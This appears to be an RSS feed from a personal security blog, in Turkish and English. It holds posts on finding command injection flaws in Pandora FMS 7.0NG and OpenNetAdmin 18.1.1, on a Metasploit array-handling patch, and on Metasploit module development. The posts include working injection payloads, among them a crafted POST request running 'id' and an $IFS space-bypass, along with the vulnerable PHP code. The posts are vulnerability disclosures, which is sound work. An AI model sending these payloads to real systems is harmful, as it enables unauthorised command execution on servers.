<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title></title>
    <description>Onur ER kişisel web sitesi ve blogum. Kişisel bilgi, deneyim ve yorumlarım ile ilginç güncel gelişmeleri paylaşıyorum.</description>
    <link>/</link>
    <atom:link href="/feed.xml" rel="self" type="application/rss+xml"/>
    <pubDate>Tue, 10 Mar 2026 15:05:14 +0000</pubDate>
    <lastBuildDate>Tue, 10 Mar 2026 15:05:14 +0000</lastBuildDate>
    <generator>Jekyll v4.3.4</generator>
    
      <item>
        <title>Pandora 7.0NG RCE Exploit</title>
        <description>&lt;p&gt;Pandora FMS bilgisayar ağlarını izlemek için kullanılan bir yazılımdır. Pandora FMS, farklı işletim sistemleri, sunucular, uygulamalar ve güvenlik duvarları, proxy’ler, veritabanları, web sunucuları veya yönlendiriciler gibi donanım sistemlerinin durumunu ve performansını görsel olarak izlemeye olanak tanır. Perl ve PHP programlama dili ile geliştirilmiştir.&lt;/p&gt;

&lt;p&gt;Pandora FMS 7.0NG sürümünde fark etmiş olduğum zafiyeti nasıl bulduğumu ve Metasploit için yazdığım exploiti inceleyeceğiz.
Yazılımın websitesinden Vmware için olan imajını &lt;a href=&quot;https://pandorafms.org/features/free-download-monitoring-software/&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;indirdim&lt;/a&gt;.
Websitesinden aldığım &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;root:pandora&lt;/code&gt; kullanıcı adı ve parolasını kullanarak SSH ile sunucuya bağlandım. İlk olarak &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;netstat -tulpn&lt;/code&gt; ile açık olan portları inceledim. 80 portunda çalışan bir web sunucu olduğunu gördüm.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;[root@pandorafms ~]# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1449/sshd           
tcp        0      0 0.0.0.0:8022            0.0.0.0:*               LISTEN      1241/anytermd       
tcp        0      0 0.0.0.0:8023            0.0.0.0:*               LISTEN      1215/anytermd       
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      2046/master         
tcp        0      0 0.0.0.0:41121           0.0.0.0:*               LISTEN      2065/perl           
tcp6       0      0 :::3306                 :::*                    LISTEN      2050/mysqld         
tcp6       0      0 :::80                   :::*                    LISTEN      845/httpd           
tcp6       0      0 :::22                   :::*                    LISTEN      1449/sshd           
tcp6       0      0 ::1:25                  :::*                    LISTEN      2046/master         
udp        0      0 0.0.0.0:36165           0.0.0.0:*                           650/dhclient        
udp        0      0 0.0.0.0:68              0.0.0.0:*                           650/dhclient        
udp6       0      0 :::20626                :::*                                650/dhclient  
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/www/html&lt;/code&gt; dizini altındaki dosyaları &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tar -zcvf /tmp/pandora.tar.gz pandora_console/&lt;/code&gt; komutu ile sıkıştırıp &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;scp root@192.168.1.15:/tmp/pandora.tar.gz pandora.tar.gz&lt;/code&gt; ile kendi bilgisayarıma indirdim.&lt;/p&gt;

&lt;p&gt;Sunucuda &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;while true; do ps aux | grep &quot;AAAtest&quot; | grep -v &quot;grep&quot; ; done&lt;/code&gt; komutunu çalıştırarak ve gönderdiğim inputları AAAtest ile değiştirerek çalıştırılan processlere etkilerini görmeye çalıştım.&lt;/p&gt;

&lt;p&gt;Manage Agents menüsünde Network Tools içinde bulunan ping gönderme özelliğini kullanırken Burp Suite isimli proxy aracı ile araya girip ip kısmını AAAtest şeklinde değiştirip gönderdim.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;[root@pandorafms ~]# while true; do ps aux | grep &quot;AAAtest&quot; | grep -v &quot;grep&quot; ; done
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
apache    3941  0.0  0.0  28516  1412 ?        S    02:12   0:00 /usr/bin/ping -c 5 AAAtest
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Linux’da &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;;&lt;/code&gt; işareti kullanılarak tek satırda iki veya daha fazla komut sırayla çalıştırılabilir. Bu özelliği kullanarak ping komutundan sonra &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;touch /tmp/test&lt;/code&gt; şeklinde bir komut çalıştırmaya çalıştım. Sunucu tarafında bu komutun nasıl çalıştığını görmek için grep’teki AAAtest kısmını ping ile değiştirdim.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;[root@pandorafms ~]# while true; do ps aux | grep &quot;ping&quot; | grep -v &quot;grep&quot; ; done
apache    4239  0.0  0.0  11628  1356 ?        S    02:17   0:00 sh -c /usr/bin/ping -c 5 ;touch&amp;amp;#x20;/tmp/test
apache    4243  0.0  0.0  11628   196 ?        R    02:17   0:00 sh -c /usr/bin/ping -c 5 ;touch&amp;amp;#x20;/tmp/test
apache    4247  0.0  0.0  11628   196 ?        R    02:17   0:00 sh -c /usr/bin/ping -c 5 ;touch&amp;amp;#x20;/tmp/test

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Yukarıda da gözüktüğü gibi boşluk karakteri yerine &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;amp;#x20;&lt;/code&gt; şeklinde HTML encoding uygulanıyordu. Bu durumdan kurtulmak için Linux’da bulunan $IFS özelliğini kullandım. Payload’u &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;;touch$IFS/tmp/test&lt;/code&gt; şeklinde gönderdiğimde komut çalıştı ve /tmp dizininde test adındaki dosya oluştu.&lt;/p&gt;

&lt;p&gt;Sunucudan indirdiğim dosyaları incelediğimde sorunun net_tools.php dosyasındaki 179. satırındaki &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;system&lt;/code&gt; fonksiyonuna gelen ip değişkeninin yetersiz kontrolünden kaynaklanmaktadır.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;...
case 2:
  $ping = whereis_the_command (&apos;ping&apos;);
  if (empty($ping)) {
  	ui_print_error_message(__(&apos;Ping executable does not exist.&apos;));
  }
  else {
  	echo &quot;&amp;lt;h3&amp;gt;&quot; . __(&quot;Ping to %s&quot;, $ip) . &quot;&amp;lt;/h3&amp;gt;&quot;;
  	echo &quot;&amp;lt;pre&amp;gt;&quot;;
  	echo system (&quot;$ping -c 5 $ip&quot;);
  	echo &quot;&amp;lt;/pre&amp;gt;&quot;;
  }
  break;
...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Yazmış olduğum exploit’in tamamını &lt;a href=&quot;https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/pandora_ping_cmd_exec.rb&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;linkten&lt;/a&gt; inceleyebilirsiniz.&lt;/p&gt;
</description>
        <pubDate>Thu, 21 May 2020 00:00:00 +0000</pubDate>
        <link>/pandorafms-7NG-rce/</link>
        <guid isPermaLink="true">/pandorafms-7NG-rce/</guid>
        
        <category>exploit</category>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        <category>Remote Code Execution</category>
        
        <category>rce</category>
        
        
      </item>
    
      <item>
        <title>Metasploit Array Handling</title>
        <description>&lt;p&gt;When developing exploit for &lt;a href=&quot;/opennetadmin-command-injection/&quot; target=&quot;blank&quot;&gt;OpenNetAdmin&lt;/a&gt; , more than one values sent with the same parameter.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;vars_post = {
      &apos;xajax&apos;       =&amp;gt; &apos;window_submit&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; &apos;tooltips&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; &apos;ip%3D%3E;#{filter_bad_chars(cmd)};&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; &apos;ping&apos;
    }
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;However, when using vars_post in Metasploit, the values were received as hash, and when trying to send it as above, the error was encountered. The request that sent looks like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;xajax=window_submit&amp;amp;xajaxargs%5B%5D=ping&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;With the change I made in the &lt;a href=&quot;https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L150&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;client_request.rb&lt;/a&gt;  file, array handling support was added to POST request.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;opts[&apos;vars_post&apos;].each_pair do |var,val|
  var = var.to_s
  unless val.is_a?(Array)
    val = [val]
  end
  val.each do |v|
    v = v.to_s
    pstr &amp;lt;&amp;lt; &apos;&amp;amp;&apos; if pstr.length &amp;gt; 0
    pstr &amp;lt;&amp;lt; (opts[&apos;encode_params&apos;] ? set_encode_uri(var) : var)
    pstr &amp;lt;&amp;lt; &apos;=&apos;
    pstr &amp;lt;&amp;lt; (opts[&apos;encode_params&apos;] ? set_encode_uri(v) : v)
  end
end
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Metasploit has started to accept the values to be sent with the same parameter as below as an array.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;vars_post = {
      &apos;xajax&apos;          =&amp;gt; &apos;window_submit&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; [&apos;tooltips&apos;, &apos;ip=&amp;gt;;#{cmd};&apos;, &apos;ping&apos;]
    }
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
</description>
        <pubDate>Sat, 22 Feb 2020 00:00:00 +0000</pubDate>
        <link>/metasploit-array-handling/</link>
        <guid isPermaLink="true">/metasploit-array-handling/</guid>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        
      </item>
    
      <item>
        <title>Metasploit Dizi İşleme Desteği</title>
        <description>&lt;p&gt;&lt;a href=&quot;/opennetadmin-command-injection/&quot; target=&quot;blank&quot;&gt;OpenNetAdmin&lt;/a&gt; için exploit geliştirirken aynı parametre ile birden fazla değer gönderilmekteydi.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;vars_post = {
      &apos;xajax&apos;       =&amp;gt; &apos;window_submit&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; &apos;tooltips&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; &apos;ip%3D%3E;#{filter_bad_chars(cmd)};&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; &apos;ping&apos;
    }
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Fakat Metasploit’te vars_post kullanılırken değerler hash olarak alındığı için yukarıdaki gibi gönderilmeye çalıştığında hata ile karşılaşılmaktaydı ve giden istek &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;xajax=window_submit&amp;amp;xajaxargs%5B%5D=ping&lt;/code&gt; şeklinde gözükmekteydi.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L150&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;client_request.rb&lt;/a&gt; dosyasında yapmış olduğum değişiklik ile post atılırken dizi işleme desteği eklenmiştir.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;opts[&apos;vars_post&apos;].each_pair do |var,val|
  var = var.to_s
  unless val.is_a?(Array)
    val = [val]
  end
  val.each do |v|
    v = v.to_s
    pstr &amp;lt;&amp;lt; &apos;&amp;amp;&apos; if pstr.length &amp;gt; 0
    pstr &amp;lt;&amp;lt; (opts[&apos;encode_params&apos;] ? set_encode_uri(var) : var)
    pstr &amp;lt;&amp;lt; &apos;=&apos;
    pstr &amp;lt;&amp;lt; (opts[&apos;encode_params&apos;] ? set_encode_uri(v) : v)
  end
end
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;vars_post içerisinde gelen anahtar-değer çifti ‘var’ ve ‘val’ olarak alınmıştır. var string’e çevrilip val’ın dizi olup olmadığı kontrol edilmiştir. Eğer dizi değil ise diziye çevrilmiştir.&lt;/p&gt;

&lt;p&gt;val dizisi v olarak döngüde kullanılıp gelen her değer string’e çevrilip anahtar ile birleştirilip “pstr” değişkenine atanmıştır.&lt;/p&gt;

&lt;p&gt;Metasploit aşağıdaki gibi aynı parametre ile gönderilecek değerleri dizi olarak da kabul etmeye başlamıştır.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;vars_post = {
      &apos;xajax&apos;          =&amp;gt; &apos;window_submit&apos;,
      &apos;xajaxargs[]&apos; =&amp;gt; [&apos;tooltips&apos;, &apos;ip=&amp;gt;;#{cmd};&apos;, &apos;ping&apos;]
    }
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
</description>
        <pubDate>Fri, 21 Feb 2020 00:00:00 +0000</pubDate>
        <link>/metasploit-dizi-isleme/</link>
        <guid isPermaLink="true">/metasploit-dizi-isleme/</guid>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        
      </item>
    
      <item>
        <title>Metasploit Exploit Geliştirme - 3</title>
        <description>&lt;h4 id=&quot;http-istekleri-göndermek&quot;&gt;HTTP istekleri göndermek&lt;/h4&gt;

&lt;p&gt;Modül yazarken HTTP istekleri göndermemiz ve cevabını alıp ayrıştırmamız gerekebilir. HTTP istekleri gönderebilmek için &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;include Msf::Exploit::Remote::HttpClient&lt;/code&gt; satırı modüle eklenmelidir.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;send_request_cgi({
	&apos;method&apos;   =&amp;gt; &apos;GET&apos;,
	&apos;uri&apos;      =&amp;gt; &apos;/index.php&apos;,
	&apos;vars_get&apos; =&amp;gt; {
		&apos;parametre1&apos; =&amp;gt; &apos;test1&apos;,
		&apos;parametre2&apos; =&amp;gt; &apos;test2&apos;
	}
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Yukarıdaki örnekte örnek bir GET isteği gösterilmiştir. Örneğin &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;test/index.php&lt;/code&gt; gibi bir url oluşturulamaya çalıştığımızda / işaretleri bazen çift konulabilmekte veya eksik kalabilmektedir. Bu durum sık yapılan hatalardandır. Güvenli şekilde url oluşturabilmek için &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;normalize_uri&lt;/code&gt; kullanılır.&lt;/p&gt;

&lt;p&gt;1 – Çalışan uygulama bir dizin altında çalıştığı zaman bunu belirtmek için &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TARGETURI&lt;/code&gt; datastore’a kaydedilir.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;register_options(
	[
		OptString.new(&apos;TARGETURI&apos;, [true, &apos;Varsayılan Dizin&apos;, &apos;/uygulama/&apos;])
	], self.class)


res = send_request_cgi({
	&apos;method&apos;   =&amp;gt; &apos;GET&apos;,
	&apos;uri&apos;      =&amp;gt; normalize_uri(target_uri, &apos;admin&apos;, &apos;login.php&apos;),
				# &quot;/uygulama/admin/login.php&quot; döndürür.
	&apos;vars_get&apos; =&amp;gt; {
		&apos;parametre1&apos; =&amp;gt; &apos;test1&apos;,
		&apos;parametre2&apos; =&amp;gt; &apos;test2&apos;
	}
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Örnek bir POST isteği de alttaki gibidir.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;res = send_request_cgi({
	&apos;method&apos;   =&amp;gt; &apos;POST&apos;,
	&apos;uri&apos;      =&amp;gt; normalize_uri(uri, &apos;admin&apos;, &apos;login.php&apos;),
	&apos;vars_post&apos; =&amp;gt; {
		&apos;parametre1&apos; =&amp;gt; &apos;test1&apos;,
		&apos;parametre2&apos; =&amp;gt; &apos;test2&apos;
	}
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h4 id=&quot;http-response-ayrıştırma&quot;&gt;HTTP Response ayrıştırma&lt;/h4&gt;

&lt;p&gt;Gelen response objesini &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;res&lt;/code&gt; değişkenine atadık.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;data = res.body
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;ile response’un body kısmını alabiliriz. HTTP yanıtını string olarak almak istersek&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;raw_res = res.to_s
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;ile alabiliriz.&lt;/p&gt;

&lt;p&gt;Nokogiri kütüphanesi ile HTTP response’unu parçalayarak istediğimiz kısımı alabiliriz.&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;html = res.get_html_document
greeting = html.at(&apos;div&apos;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Örnekte div tag’ı olan yerler bulunmuştur.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework/wiki/How-to-parse-an-HTTP-response&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;https://github.com/rapid7/metasploit-framework/wiki/How-to-parse-an-HTTP-response&lt;/a&gt;&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;surum = res.body.scan(/Version  = &quot;(.*?)&quot;/).flatten.first.to_s
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;
&lt;p&gt;Yukarıdaki örnekte Version = “2.3.4” geçen yer response içerisinde bulunarak 2.3.4 değeri surum değişkenine atanmıştır.&lt;/p&gt;

&lt;h4 id=&quot;burp-suite-ile-çalışma&quot;&gt;Burp Suite ile çalışma&lt;/h4&gt;

&lt;p&gt;Burp Suite, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HttpClient&lt;/code&gt; kullanarak bir modül geliştirirken HTTP trafiğini incelemek veya değiştirmek içinde kullanışlı bir araçtır. Bunu yapmak için:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Burp Suite’i çalıştırın.&lt;/li&gt;
  &lt;li&gt;Çalışmak istediğininiz modülü &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;use&lt;/code&gt; ile seçin.&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;set Proxies HTTP:127.0.0.1:8080&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;Modül çalıştırıldığında HTTP trafiğinine müdahale edebilmelidir.&lt;/li&gt;
&lt;/ol&gt;
</description>
        <pubDate>Tue, 04 Feb 2020 00:00:00 +0000</pubDate>
        <link>/metasploit-exploit-gelistirme-3/</link>
        <guid isPermaLink="true">/metasploit-exploit-gelistirme-3/</guid>
        
        <category>exploit</category>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        
      </item>
    
      <item>
        <title>OpenNetAdmin 18.1.1 Command Injection</title>
        <description>&lt;p&gt;OpenNetAdmin; DNS adresleri, IP adresleri, Alt ağlar, MAC adresleri gibi ağ ayarlarını yapmayı ve izlemeyi sağlayan IPAM (IP Adres Yönetimi) aracıdır. Eklentileri kullanarak daha fazla özellik eklenebilmektedir. Php programlama dili ile geliştirilmiştir.&lt;/p&gt;

&lt;p&gt;OpenNetAdmin’in 8.5.14 ve 18.1.1 arasındaki sürümlerindeki zafiyetten dolayı komut enjekte edilerek sunucu üzerinde çalıştırılabilmektedir.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# ona/www/winc/tooltips.inc.php

function ws_ping($window_name, $form=&apos;&apos;) {
    // If an array in a string was provided, build the array and store it in $form
    $form = parse_options_string($form);
    $output = shell_exec(&quot;ping -n -w 3 -c 3 {$form[&apos;ip&apos;]}&quot;);
    $window[&apos;title&apos;] = &apos;Ping Results&apos;;
    $build_commit_html = 0;
    $commit_function = &apos;&apos;;
    include(window_find_include(&apos;module_results&apos;));
    return(window_open(&quot;{$window_name}_results&quot;, $window));
}

&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Yukarıdaki kod bloğunda OpenNetAdmin’in 18.1.1 sürümünde ping göndermek için kullanılan fonksiyon verilmiştir.
Web tarayıcı üzerinden gönderilen ip adresi  &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$output = shell_exec(&quot;ping -n -w 3 -c 3 {$form[&apos;ip&apos;]}&quot;);&lt;/code&gt; satırında kullanılmıştır.&lt;br /&gt;
shell_exec fonksiyonu içine yazılan komutu kabukta çalıştırır ve çıktının tamamını bir string olarak döndürür. Post metodu ile alınan &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;$form[&apos;ip&apos;]&lt;/code&gt; değeri fonksiyon içinde kontrol edilmeden kullanılması bu zafiyete sebep olmaktadır.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;POST /ona/login.php HTTP/1.1
Host: 172.16.172.157
Connection: keep-alive
Content-Length: 98
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: tr,tr-TR;q=0.9,en-US;q=0.8,en;q=0.7

xajax=window_submit&amp;amp;xajaxargs[]=tooltips&amp;amp;xajaxargs[]=ip%3D&amp;gt;;id;&amp;amp;xajaxargs[]=ping
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Eğer yukarıdaki gibi bir HTTP isteği gönderirsek dönen cevabın içinde çalıştırdığımız &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;id&lt;/code&gt; komutunun cevabı da gelecektir.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;....
&amp;lt;td align=&quot;left&quot; class=&quot;padding&quot;&amp;gt;
    &amp;lt;br&amp;gt;
    &amp;lt;div style=&quot;border: solid 2px #000000; background-color: #FFFFFF; width: 650px; height: 350px; overflow: auto;resize: both;&quot;&amp;gt;
        &amp;lt;pre style=&quot;padding: 4px;font-family: monospace;&quot;&amp;gt;uid=33(www-data) gid=33(www-data) groups=33(www-data)
&amp;lt;/pre&amp;gt;
    &amp;lt;/div&amp;gt;
&amp;lt;/td&amp;gt;
....
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Yazmış olduğum exploit’e &lt;a href=&quot;https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb&quot; target=&quot;blank&quot; rel=&quot;nofollow&quot;&gt;buradan&lt;/a&gt; erişebilirsiniz.&lt;/p&gt;
</description>
        <pubDate>Wed, 25 Dec 2019 00:00:00 +0000</pubDate>
        <link>/opennetadmin-command-injection/</link>
        <guid isPermaLink="true">/opennetadmin-command-injection/</guid>
        
        <category>exploit</category>
        
        <category>development</category>
        
        <category>metasploit</category>
        
        
      </item>
    
      <item>
        <title>Metasploit Exploit Geliştirme - 2</title>
        <description>&lt;h3 id=&quot;metasploit-framework&quot;&gt;Metasploit Framework&lt;/h3&gt;

&lt;p&gt;Metasploit sızma testlerinde en çok kullanılan exploit framework’üdür. İçerisinde exploitler, payloadlar, auxiliaryler ve encoderlerin bulunduğu bir altyapıdır. Ruby dili ile yazılmıştır.&lt;/p&gt;

&lt;h4 id=&quot;linux-ve-mac-os-xde-kurulumu&quot;&gt;Linux ve Mac OS X’de kurulumu&lt;/h4&gt;
&lt;div class=&quot;language-shell highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb &lt;span class=&quot;o&quot;&gt;&amp;gt;&lt;/span&gt; msfinstall &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
  &lt;span class=&quot;nb&quot;&gt;chmod &lt;/span&gt;755 msfinstall &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
  ./msfinstall
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h4 id=&quot;kullanımı&quot;&gt;Kullanımı&lt;/h4&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;msfconsole&lt;/code&gt; komutu ile başlatılır.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;search&lt;/code&gt; modüller içinde arama yapmayı sağlar. Arama sonucunu daraltabileceğiniz parametrelere sahiptir. (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;help search&lt;/code&gt;)&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;info&lt;/code&gt; ile herhangi bir modül hakkında detaylı bilgileri inceleyebiliriz.&lt;br /&gt;
(&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;info exploit/unix/ftp/vsftpd_234_backdoor&lt;/code&gt;)&lt;/p&gt;
